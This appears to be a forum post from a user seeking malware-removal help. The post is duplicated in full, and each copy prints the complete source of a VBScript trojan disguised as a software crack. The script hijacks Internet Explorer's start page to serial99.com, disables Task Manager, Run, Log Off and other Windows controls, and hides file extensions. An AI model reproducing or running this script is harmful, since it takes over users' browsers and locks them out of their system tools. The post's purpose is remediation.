Hi, I got the www serial99.com/?a infection where it redirected me to that url each time, it also disabled Run, Task manager, recent docs, etc.
There is this new avpm.vbs file in my C drive, I don't know if I can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):
wscript.echo "Cracking... now! Click here for crack!"
itemtype = "REG_SZ"
mustboot = "www serial99.com"
jobfunc = "CRACKED!"
t = "Successfull!"
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
Set Kaspersky = WScript.CreateObject("WScript.Shell")
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"
-----------
Rootkit scan didn't find anything
I'm guessing to fix my the recent docs etc. I just have to change these? :
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"=0 (0x0)
"DisableTaskMgr"=0 (0x0)
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"=0 (0x0)
"NoLogoff"=1
"NoRun"=1
"NoFind"=1
"NoRecentDocsMenu"=1
"NoClose"=1
----------
Also when I ran the AVG anti-spyware my kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.
By the way before I came to this site I ran DSS (Deckard's System Scanner)
which I think is based on combo fix so I'm including the log as it shows the hijackthis stuff that was removed, and the stuff combo fix would have done. (sry about this I know u don't want extra logs)
There is this new avpm.vbs file in my C drive, I don't know if I can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):
wscript.echo "Cracking... now! Click here for crack!"
itemtype = "REG_SZ"
mustboot = "www serial99.com"
jobfunc = "CRACKED!"
t = "Successfull!"
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
Set Kaspersky = WScript.CreateObject("WScript.Shell")
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"
-----------
Rootkit scan didn't find anything
I'm guessing to fix my the recent docs etc. I just have to change these? :
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"=0 (0x0)
"DisableTaskMgr"=0 (0x0)
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"=0 (0x0)
"NoLogoff"=1
"NoRun"=1
"NoFind"=1
"NoRecentDocsMenu"=1
"NoClose"=1
----------
Also when I ran the AVG anti-spyware my kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.
By the way before I came to this site I ran DSS (Deckard's System Scanner)
which I think is based on combo fix so I'm including the log as it shows the hijackthis stuff that was removed, and the stuff combo fix would have done. (sry about this I know u don't want extra logs)